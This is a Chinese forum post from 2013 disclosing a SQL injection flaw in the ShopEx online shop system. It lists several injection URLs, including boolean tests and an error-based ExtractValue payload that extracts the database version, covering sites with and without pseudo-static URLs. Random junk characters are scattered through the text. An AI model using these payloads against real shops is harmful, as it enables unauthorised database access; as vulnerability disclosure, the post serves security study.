注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… - u' l1 g5 [. l0 ~9 u+ i1 D
9 M6 D: Y$ t4 L3 G! J U( d- I1 t
好吧,我扯远了~~) f3 C1 G9 g7 @6 I
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~6 b) q' f& O: [- Z2 e
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
5 F* Z1 s3 `; h& \+ k8 w
& y; v; P9 @8 Y; y1 khttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html $ p7 }7 F* @) h$ p
% F9 I# y+ W8 T) j( M9 u4 |
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
2 C, T9 `% \. {1 R9 A% x/ e9 I$ C% z v3 X8 J
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html % u3 N4 `& Z1 J2 B D8 D
2 R f- ]" L) p6 q4 y) u" qhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ' r, c" }& X1 b. S+ ^
0 C7 X. g9 J* B. W& }. m% c; {7 n 4 A, ], R0 E; K: N. @/ s. w
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。6 c, [/ C( M d- \+ u* u. ?
如何注入就不多说了,10多年的东西了…不会也会了… 3 q& A/ p/ E2 _& _
* a! E; F I. `$ ^2 N- O
/ M0 ~) ?0 r& L2 y! o- A7 X; {8 g- W6 D8 Z* ]) E1 }: L
* w6 ]$ T* _: A) F( v. Z
|
发表于 2013-2-19 08:31:27
收藏
支持
反对